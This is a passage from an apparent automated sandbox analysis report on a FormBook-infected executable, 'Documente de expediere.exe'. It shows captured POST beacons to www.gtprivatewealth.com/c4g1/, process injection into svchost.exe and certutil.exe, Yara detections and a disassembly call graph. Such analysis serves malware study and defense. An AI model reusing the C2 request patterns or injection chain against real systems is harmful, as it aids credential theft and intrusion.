                                              Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                                              Jul 21, 2024 13:34:32.188410044 CEST524INData Raw: 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74
                                              Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              49192.168.2.7497543.33.130.19080
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:34:37.243309021 CEST730OUTPOST /c4g1/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.gtprivatewealth.com
                                              Origin: http://www.gtprivatewealth.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.gtprivatewealth.com/c4g1/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 31 51 71 77 63 34 62 34 6d 62 39 68 42 63 6e 35 50 54 39 6f 32 54 4f 46 7a 6b 6b 50 48 36 66 47 6e 74 44 42 49 6f 75 34 56 72 2b 36 55 50 6f 53 53 30 75 39 74 53 6f 32 61 6f 77 76 41 6f 62 63 77 56 79 6c 76 57 45 41 31 35 4f 66 38 6a 42 35 6e 5a 2f 59 47 47 49 49 6f 53 37 6f 4f 46 42 69 76 71 2b 2b 75 34 54 68 46 74 30 42 4d 67 69 6c 34 52 5a 34 32 33 57 63 6a 69 34 79 56 76 7a 68 55 4b 32 59 66 66 38 33 66 48 71 63 6f 70 2f 77 31 42 36 42 62 47 46 5a 34 7a 77 4c 50 2f 64 68 48 62 36 4e 75 36 69 69 45 59 68 49 4d 46 46 72 46 65 59 64 2b 76 41 65 38 75 42 54 4c 56 4f 77 54 37 2b 48 34 48 62 65 51 4d 44 72 6a 62 63 2f 52 77 3d 3d
                                              Data Ascii: 5HE=1Qqwc4b4mb9hBcn5PT9o2TOFzkkPH6fGntDBIou4Vr+6UPoSS0u9tSo2aowvAobcwVylvWEA15Of8jB5nZ/YGGIIoS7oOFBivq++u4ThFt0BMgil4RZ423Wcji4yVvzhUK2Yff83fHqcop/w1B6BbGFZ4zwLP/dhHb6Nu6iiEYhIMFFrFeYd+vAe8uBTLVOwT7+H4HbeQMDrjbc/Rw==


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              50192.168.2.7497553.33.130.19080
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:34:39.783036947 CEST750OUTPOST /c4g1/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.gtprivatewealth.com
                                              Origin: http://www.gtprivatewealth.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.gtprivatewealth.com/c4g1/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 31 51 71 77 63 34 62 34 6d 62 39 68 41 38 58 35 4a 7a 42 6f 39 54 50 33 38 45 6b 50 4e 61 66 4b 6e 74 66 42 49 70 61 6f 56 5a 71 36 56 74 77 53 52 31 75 39 71 53 6f 32 4f 34 77 75 45 6f 62 58 77 55 50 61 76 58 6f 41 31 35 71 66 38 69 78 35 6e 75 6a 5a 48 57 49 57 75 53 37 71 41 6c 42 69 76 71 2b 2b 75 34 76 48 46 74 73 42 50 54 71 6c 35 7a 78 33 37 58 57 64 6b 69 34 79 52 76 79 4a 55 4b 33 31 66 61 5a 59 66 42 32 63 6f 6f 6a 77 79 51 36 43 4d 32 46 54 6d 44 78 54 41 74 4d 2f 49 34 65 41 6e 38 79 63 4e 34 4a 65 41 54 59 4a 66 38 55 78 67 2b 34 6c 34 73 6c 6c 63 7a 54 46 52 36 36 66 31 6c 76 2f 50 37 6d 42 75 4a 39 37 48 46 75 7a 68 55 55 6d 4a 6a 56 61 77 51 56 62 4d 4b 50 56 79 6c 34 3d
                                              Data Ascii: 5HE=1Qqwc4b4mb9hA8X5JzBo9TP38EkPNafKntfBIpaoVZq6VtwSR1u9qSo2O4wuEobXwUPavXoA15qf8ix5nujZHWIWuS7qAlBivq++u4vHFtsBPTql5zx37XWdki4yRvyJUK31faZYfB2coojwyQ6CM2FTmDxTAtM/I4eAn8ycN4JeATYJf8Uxg+4l4sllczTFR66f1lv/P7mBuJ97HFuzhUUmJjVawQVbMKPVyl4=


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:07:30:21
                                              Start date:21/07/2024
                                              Path:C:\Users\user\Desktop\Documente de expediere.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Documente de expediere.exe"
                                              Imagebase:0x690000
                                              File size:1'168'384 bytes
                                              MD5 hash:3ED2ECA087936D7AB479CE62C50A9F2A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:07:30:23
                                              Start date:21/07/2024
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Documente de expediere.exe"
                                              Imagebase:0x700000
                                              File size:46'504 bytes
                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:07:30:43
                                              Start date:21/07/2024
                                              Path:C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe"
                                              Imagebase:0xb00000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:14
                                              Start time:07:30:45
                                              Start date:21/07/2024
                                              Path:C:\Windows\SysWOW64\certutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\certutil.exe"
                                              Imagebase:0xe60000
                                              File size:1'277'440 bytes
                                              MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:15
                                              Start time:09:17:57
                                              Start date:21/07/2024
                                              Path:C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe"
                                              Imagebase:0xb00000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:18
                                              Start time:09:18:15
                                              Start date:21/07/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff722870000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:3.9%
                                                Dynamic/Decrypted Code Coverage:0.4%
                                                Signature Coverage:2.9%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:154
                                                execution_graph 97723 69568a 97730 695c18 97723->97730 97728 6956ba Mailbox 97742 6b0ff6 97730->97742 97732 695c2b 97733 6b0ff6 Mailbox 59 API calls 97732->97733 97734 69569c 97733->97734 97735 695632 97734->97735 97780 695a2f 97735->97780 97737 695674 97737->97728 97741 6981c1 61 API calls Mailbox 97737->97741 97739 695643 97739->97737 97787 695d20 97739->97787 97793 695bda 97739->97793 97741->97728 97745 6b0ffe 97742->97745 97744 6b1018 97744->97732 97745->97744 97747 6b101c std::exception::exception 97745->97747 97752 6b594c 97745->97752 97769 6b35e1 DecodePointer 97745->97769 97770 6b87db RaiseException 97747->97770 97749 6b1046 97771 6b8711 58 API calls _free 97749->97771 97751 6b1058 97751->97732 97753 6b59c7 97752->97753 97761 6b5958 97752->97761 97778 6b35e1 DecodePointer 97753->97778 97755 6b59cd 97779 6b8d68 58 API calls __getptd_noexit 97755->97779 97758 6b598b RtlAllocateHeap 97758->97761 97768 6b59bf 97758->97768 97760 6b59b3 97776 6b8d68 58 API calls __getptd_noexit 97760->97776 97761->97758 97761->97760 97765 6b59b1 97761->97765 97766 6b5963 97761->97766 97775 6b35e1 DecodePointer 97761->97775 97777 6b8d68 58 API calls __getptd_noexit 97765->97777 97766->97761 97772 6ba3ab 58 API calls __NMSG_WRITE 97766->97772 97773 6ba408 58 API calls 5 library calls 97766->97773 97774 6b32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97766->97774 97768->97745 97769->97745 97770->97749 97771->97751 97772->97766 97773->97766 97775->97761 97776->97765 97777->97768 97778->97755 97779->97768 97781 6ce065 97780->97781 97782 695a40 97780->97782 97802 6e6443 59 API calls Mailbox 97781->97802 97782->97739 97784 6ce06f 97785 6b0ff6 Mailbox 59 API calls 97784->97785 97786 6ce07b 97785->97786 97788 695d93 97787->97788 97790 695d2e 97787->97790 97803 695dae SetFilePointerEx 97788->97803 97791 695d56 97790->97791 97792 695d66 ReadFile 97790->97792 97791->97739 97792->97790 97792->97791 97794 695bee 97793->97794 97795 6ce117 97793->97795 97804 695b19 97794->97804 97809 6e6443 59 API calls Mailbox 97795->97809 97798 6ce122 97800 6b0ff6 Mailbox 59 API calls 97798->97800 97799 695bfa 97799->97739 97801 6ce137 _memmove 97800->97801 97802->97784 97803->97790 97805 695b31 97804->97805 97808 695b2a _memmove 97804->97808 97806 6b0ff6 Mailbox 59 API calls 97805->97806 97807 6ce0a7 97805->97807 97806->97808 97808->97799 97809->97798 97810 69107d 97815 6971eb 97810->97815 97812 69108c 97846 6b2f80 97812->97846 97816 6971fb __ftell_nolock 97815->97816 97849 6977c7 97816->97849 97820 6972ba 97861 6b074f 97820->97861 97827 6977c7 59 API calls 97828 6972eb 97827->97828 97880 697eec 97828->97880 97830 6972f4 RegOpenKeyExW 97831 6cecda RegQueryValueExW 97830->97831 97835 697316 Mailbox 97830->97835 97832 6ced6c RegCloseKey 97831->97832 97833 6cecf7 97831->97833 97832->97835 97845 6ced7e _wcscat Mailbox __NMSG_WRITE 97832->97845 97834 6b0ff6 Mailbox 59 API calls 97833->97834 97836 6ced10 97834->97836 97835->97812 97884 69538e 97836->97884 97839 6ced38 97887 697d2c 97839->97887 97841 697b52 59 API calls 97841->97845 97842 6ced52 97842->97832 97844 693f84 59 API calls 97844->97845 97845->97835 97845->97841 97845->97844 97896 697f41 97845->97896 97933 6b2e84 97846->97933 97848 691096 97850 6b0ff6 Mailbox 59 API calls 97849->97850 97851 6977e8 97850->97851 97852 6b0ff6 Mailbox 59 API calls 97851->97852 97853 6972b1 97852->97853 97854 694864 97853->97854 97900 6c1b90 97854->97900 97857 697f41 59 API calls 97858 694897 97857->97858 97902 6948ae 97858->97902 97860 6948a1 Mailbox 97860->97820 97862 6c1b90 __ftell_nolock 97861->97862 97863 6b075c GetFullPathNameW 97862->97863 97864 6b077e 97863->97864 97865 697d2c 59 API calls 97864->97865 97866 6972c5 97865->97866 97867 697e0b 97866->97867 97868 697e1f 97867->97868 97869 6cf173 97867->97869 97924 697db0 97868->97924 97929 698189 97869->97929 97872 6972d3 97874 693f84 97872->97874 97873 6cf17e __NMSG_WRITE _memmove 97875 693f92 97874->97875 97879 693fb4 _memmove 97874->97879 97878 6b0ff6 Mailbox 59 API calls 97875->97878 97876 6b0ff6 Mailbox 59 API calls 97877 693fc8 97876->97877 97877->97827 97878->97879 97879->97876 97881 697f06 97880->97881 97883 697ef9 97880->97883 97882 6b0ff6 Mailbox 59 API calls 97881->97882 97882->97883 97883->97830 97885 6b0ff6 Mailbox 59 API calls 97884->97885 97886 6953a0 RegQueryValueExW 97885->97886 97886->97839 97886->97842 97888 697d38 __NMSG_WRITE 97887->97888 97889 697da5 97887->97889 97891 697d4e 97888->97891 97892 697d73 97888->97892 97890 697e8c 59 API calls 97889->97890 97895 697d56 _memmove 97890->97895 97932 698087 59 API calls Mailbox 97891->97932 97893 698189 59 API calls 97892->97893 97893->97895 97895->97842 97897 697f50 __NMSG_WRITE _memmove 97896->97897 97898 6b0ff6 Mailbox 59 API calls 97897->97898 97899 697f8e 97898->97899 97899->97845 97901 694871 GetModuleFileNameW 97900->97901 97901->97857 97903 6c1b90 __ftell_nolock 97902->97903 97904 6948bb GetFullPathNameW 97903->97904 97905 6948da 97904->97905 97906 6948f7 97904->97906 97908 697d2c 59 API calls 97905->97908 97907 697eec 59 API calls 97906->97907 97909 6948e6 97907->97909 97908->97909 97912 697886 97909->97912 97913 697894 97912->97913 97916 697e8c 97913->97916 97915 6948f2 97915->97860 97917 697e9a 97916->97917 97919 697ea3 _memmove 97916->97919 97917->97919 97920 697faf 97917->97920 97919->97915 97921 697fc2 97920->97921 97923 697fbf _memmove 97920->97923 97922 6b0ff6 Mailbox 59 API calls 97921->97922 97922->97923 97923->97919 97925 697dbf __NMSG_WRITE 97924->97925 97926 698189 59 API calls 97925->97926 97927 697dd0 _memmove 97925->97927 97928 6cf130 _memmove 97926->97928 97927->97872 97930 6b0ff6 Mailbox 59 API calls 97929->97930 97931 698193 97930->97931 97931->97873 97932->97895 97934 6b2e90 __tzset_nolock 97933->97934 97941 6b3457 97934->97941 97940 6b2eb7 __tzset_nolock 97940->97848 97958 6b9e4b 97941->97958 97943 6b2e99 97944 6b2ec8 DecodePointer DecodePointer 97943->97944 97945 6b2ea5 97944->97945 97946 6b2ef5 97944->97946 97955 6b2ec2 97945->97955 97946->97945 98004 6b89e4 59 API calls __ftell_nolock 97946->98004 97948 6b2f58 EncodePointer EncodePointer 97948->97945 97949 6b2f2c 97949->97945 97953 6b2f46 EncodePointer 97949->97953 98006 6b8aa4 61 API calls 2 library calls 97949->98006 97950 6b2f07 97950->97948 97950->97949 98005 6b8aa4 61 API calls 2 library calls 97950->98005 97953->97948 97954 6b2f40 97954->97945 97954->97953 98007 6b3460 97955->98007 97959 6b9e6f EnterCriticalSection 97958->97959 97960 6b9e5c 97958->97960 97959->97943 97965 6b9ed3 97960->97965 97962 6b9e62 97962->97959 97989 6b32f5 58 API calls 3 library calls 97962->97989 97966 6b9edf __tzset_nolock 97965->97966 97967 6b9ee8 97966->97967 97968 6b9f00 97966->97968 97990 6ba3ab 58 API calls __NMSG_WRITE 97967->97990 97973 6b9f21 __tzset_nolock 97968->97973 97993 6b8a5d 58 API calls 2 library calls 97968->97993 97971 6b9eed 97991 6ba408 58 API calls 5 library calls 97971->97991 97972 6b9f15 97975 6b9f2b 97972->97975 97976 6b9f1c 97972->97976 97973->97962 97979 6b9e4b __lock 58 API calls 97975->97979 97994 6b8d68 58 API calls __getptd_noexit 97976->97994 97977 6b9ef4 97992 6b32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97977->97992 97982 6b9f32 97979->97982 97983 6b9f3f 97982->97983 97984 6b9f57 97982->97984 97995 6ba06b InitializeCriticalSectionAndSpinCount 97983->97995 97996 6b2f95 97984->97996 97987 6b9f4b 98002 6b9f73 LeaveCriticalSection _doexit 97987->98002 97990->97971 97991->97977 97993->97972 97994->97973 97995->97987 97997 6b2fc7 __dosmaperr 97996->97997 97998 6b2f9e RtlFreeHeap 97996->97998 97997->97987 97998->97997 97999 6b2fb3 97998->97999 98003 6b8d68 58 API calls __getptd_noexit 97999->98003 98001 6b2fb9 GetLastError 98001->97997 98002->97973 98003->98001 98004->97950 98005->97949 98006->97954 98010 6b9fb5 LeaveCriticalSection 98007->98010 98009 6b2ec7 98009->97940 98010->98009 98011 15423b0 98025 1540000 98011->98025 98013 15424c9 98028 15422a0 98013->98028 98031 1543500 GetPEB 98025->98031 98027 154068b 98027->98013 98029 15422a9 Sleep 98028->98029 98030 15422b7 98029->98030 98032 154352a 98031->98032 98032->98027 98033 69b56e 98040 6afb84 98033->98040 98035 69b584 98049 69c707 98035->98049 98037 69b5ac 98038 69a4e8 98037->98038 98061 6fa0b5 89 API calls 4 library calls 98037->98061 98041 6afba2 98040->98041 98042 6afb90 98040->98042 98044 6afba8 98041->98044 98045 6afbd1 98041->98045 98062 699e9c 60 API calls Mailbox 98042->98062 98046 6b0ff6 Mailbox 59 API calls 98044->98046 98063 699e9c 60 API calls Mailbox 98045->98063 98048 6afb9a 98046->98048 98048->98035 98064 697b76 98049->98064 98051 69c72c _wcscmp 98052 697f41 59 API calls 98051->98052 98053 69c760 Mailbox 98051->98053 98054 6d1abb 98052->98054 98053->98037 98069 697c8e 98054->98069 98058 6d1ad7 98060 6d1adb Mailbox 98058->98060 98079 699e9c 60 API calls Mailbox 98058->98079 98060->98037 98061->98038 98062->98048 98063->98048 98065 6b0ff6 Mailbox 59 API calls 98064->98065 98066 697b9b 98065->98066 98067 698189 59 API calls 98066->98067 98068 697baa 98067->98068 98068->98051 98070 6cf094 98069->98070 98071 697ca0 98069->98071 98086 6e8123 59 API calls _memmove 98070->98086 98080 697bb1 98071->98080 98074 697cac 98078 69859a 68 API calls 98074->98078 98075 6cf09e 98087 6981a7 98075->98087 98077 6cf0a6 Mailbox 98078->98058 98079->98060 98081 697bbf 98080->98081 98085 697be5 _memmove 98080->98085 98082 6b0ff6 Mailbox 59 API calls 98081->98082 98081->98085 98083 697c34 98082->98083 98084 6b0ff6 Mailbox 59 API calls 98083->98084 98084->98085 98085->98074 98086->98075 98088 6981ba 98087->98088 98089 6981b2 98087->98089 98088->98077 98091 6980d7 59 API calls 2 library calls 98089->98091 98091->98088 98092 6b7e93 98093 6b7e9f __tzset_nolock 98092->98093 98129 6ba048 GetStartupInfoW 98093->98129 98095 6b7ea4 98131 6b8dbc GetProcessHeap 98095->98131 98097 6b7efc 98098 6b7f07 98097->98098 98214 6b7fe3 58 API calls 3 library calls 98097->98214 98132 6b9d26 98098->98132 98101 6b7f0d 98102 6b7f18 __RTC_Initialize 98101->98102 98215 6b7fe3 58 API calls 3 library calls 98101->98215 98153 6bd812 98102->98153 98105 6b7f27 98106 6b7f33 GetCommandLineW 98105->98106 98216 6b7fe3 58 API calls 3 library calls 98105->98216 98172 6c5173 GetEnvironmentStringsW 98106->98172 98109 6b7f32 98109->98106 98112 6b7f4d 98113 6b7f58 98112->98113 98217 6b32f5 58 API calls 3 library calls 98112->98217 98182 6c4fa8 98113->98182 98116 6b7f5e 98117 6b7f69 98116->98117 98218 6b32f5 58 API calls 3 library calls 98116->98218 98196 6b332f 98117->98196 98120 6b7f71 98121 6b7f7c __wwincmdln 98120->98121 98219 6b32f5 58 API calls 3 library calls 98120->98219 98202 69492e 98121->98202 98124 6b7f90 98125 6b7f9f 98124->98125 98220 6b3598 58 API calls _doexit 98124->98220 98221 6b3320 58 API calls _doexit 98125->98221 98128 6b7fa4 __tzset_nolock 98130 6ba05e 98129->98130 98130->98095 98131->98097 98222 6b33c7 36 API calls 2 library calls 98132->98222 98134 6b9d2b 98223 6b9f7c InitializeCriticalSectionAndSpinCount __mtinitlocks 98134->98223 98136 6b9d30 98137 6b9d34 98136->98137 98225 6b9fca TlsAlloc 98136->98225 98224 6b9d9c 61 API calls 2 library calls 98137->98224 98140 6b9d39 98140->98101 98141 6b9d46 98141->98137 98142 6b9d51 98141->98142 98226 6b8a15 98142->98226 98145 6b9d93 98234 6b9d9c 61 API calls 2 library calls 98145->98234 98148 6b9d72 98148->98145 98150 6b9d78 98148->98150 98149 6b9d98 98149->98101 98233 6b9c73 58 API calls 4 library calls 98150->98233 98152 6b9d80 GetCurrentThreadId 98152->98101 98154 6bd81e __tzset_nolock 98153->98154 98155 6b9e4b __lock 58 API calls 98154->98155 98156 6bd825 98155->98156 98157 6b8a15 __calloc_crt 58 API calls 98156->98157 98159 6bd836 98157->98159 98158 6bd8a1 GetStartupInfoW 98166 6bd8b6 98158->98166 98167 6bd9e5 98158->98167 98159->98158 98160 6bd841 __tzset_nolock @_EH4_CallFilterFunc@8 98159->98160 98160->98105 98161 6bdaad 98248 6bdabd LeaveCriticalSection _doexit 98161->98248 98163 6b8a15 __calloc_crt 58 API calls 98163->98166 98164 6bda32 GetStdHandle 98164->98167 98165 6bda45 GetFileType 98165->98167 98166->98163 98166->98167 98169 6bd904 98166->98169 98167->98161 98167->98164 98167->98165 98247 6ba06b InitializeCriticalSectionAndSpinCount 98167->98247 98168 6bd938 GetFileType 98168->98169 98169->98167 98169->98168 98246 6ba06b InitializeCriticalSectionAndSpinCount 98169->98246 98173 6b7f43 98172->98173 98174 6c5184 98172->98174 98178 6c4d6b GetModuleFileNameW 98173->98178 98249 6b8a5d 58 API calls 2 library calls 98174->98249 98176 6c51aa _memmove 98177 6c51c0 FreeEnvironmentStringsW 98176->98177 98177->98173 98179 6c4d9f _wparse_cmdline 98178->98179 98181 6c4ddf _wparse_cmdline 98179->98181 98250 6b8a5d 58 API calls 2 library calls 98179->98250 98181->98112 98183 6c4fb9 98182->98183 98184 6c4fc1 __NMSG_WRITE 98182->98184 98183->98116 98185 6b8a15 __calloc_crt 58 API calls 98184->98185 98188 6c4fea __NMSG_WRITE 98185->98188 98186 6c5041 98187 6b2f95 _free 58 API calls 98186->98187 98187->98183 98188->98183 98188->98186 98189 6b8a15 __calloc_crt 58 API calls 98188->98189 98190 6c5066 98188->98190 98193 6c507d 98188->98193 98251 6c4857 58 API calls __ftell_nolock 98188->98251 98189->98188 98191 6b2f95 _free 58 API calls 98190->98191 98191->98183 98252 6b9006 IsProcessorFeaturePresent 98193->98252 98195 6c5089 98195->98116 98199 6b333b __IsNonwritableInCurrentImage 98196->98199 98198 6b3359 __initterm_e 98200 6b2f80 __cinit 67 API calls 98198->98200 98201 6b3378 __cinit __IsNonwritableInCurrentImage 98198->98201 98275 6ba711 98199->98275 98200->98201 98201->98120 98203 694948 98202->98203 98213 6949e7 98202->98213 98204 694982 IsThemeActive 98203->98204 98278 6b35ac 98204->98278 98208 6949ae 98290 694a5b SystemParametersInfoW SystemParametersInfoW 98208->98290 98210 6949ba 98291 693b4c 98210->98291 98212 6949c2 SystemParametersInfoW 98212->98213 98213->98124 98214->98098 98215->98102 98216->98109 98220->98125 98221->98128 98222->98134 98223->98136 98224->98140 98225->98141 98228 6b8a1c 98226->98228 98229 6b8a57 98228->98229 98231 6b8a3a 98228->98231 98235 6c5446 98228->98235 98229->98145 98232 6ba026 TlsSetValue 98229->98232 98231->98228 98231->98229 98243 6ba372 Sleep 98231->98243 98232->98148 98233->98152 98234->98149 98236 6c546c 98235->98236 98237 6c5451 98235->98237 98240 6c547c RtlAllocateHeap 98236->98240 98241 6c5462 98236->98241 98245 6b35e1 DecodePointer 98236->98245 98237->98236 98238 6c545d 98237->98238 98244 6b8d68 58 API calls __getptd_noexit 98238->98244 98240->98236 98240->98241 98241->98228 98243->98231 98244->98241 98245->98236 98246->98169 98247->98167 98248->98160 98249->98176 98250->98181 98251->98188 98253 6b9011 98252->98253 98258 6b8e99 98253->98258 98257 6b902c 98257->98195 98259 6b8eb3 _memset __call_reportfault 98258->98259 98260 6b8ed3 IsDebuggerPresent 98259->98260 98266 6ba395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98260->98266 98262 6b8f97 __call_reportfault 98267 6bc836 98262->98267 98264 6b8fba 98265 6ba380 GetCurrentProcess TerminateProcess 98264->98265 98265->98257 98266->98262 98268 6bc83e 98267->98268 98269 6bc840 IsProcessorFeaturePresent 98267->98269 98268->98264 98271 6c5b5a 98269->98271 98274 6c5b09 5 API calls 2 library calls 98271->98274 98273 6c5c3d 98273->98264 98274->98273 98276 6ba714 EncodePointer 98275->98276 98276->98276 98277 6ba72e 98276->98277 98277->98198 98279 6b9e4b __lock 58 API calls 98278->98279 98280 6b35b7 DecodePointer EncodePointer 98279->98280 98343 6b9fb5 LeaveCriticalSection 98280->98343 98282 6949a7 98283 6b3614 98282->98283 98284 6b3638 98283->98284 98285 6b361e 98283->98285 98284->98208 98285->98284 98344 6b8d68 58 API calls __getptd_noexit 98285->98344 98287 6b3628 98345 6b8ff6 9 API calls __ftell_nolock 98287->98345 98289 6b3633 98289->98208 98290->98210 98292 693b59 __ftell_nolock 98291->98292 98293 6977c7 59 API calls 98292->98293 98294 693b63 GetCurrentDirectoryW 98293->98294 98346 693778 98294->98346 98296 693b8c IsDebuggerPresent 98297 6cd4ad MessageBoxA 98296->98297 98298 693b9a 98296->98298 98300 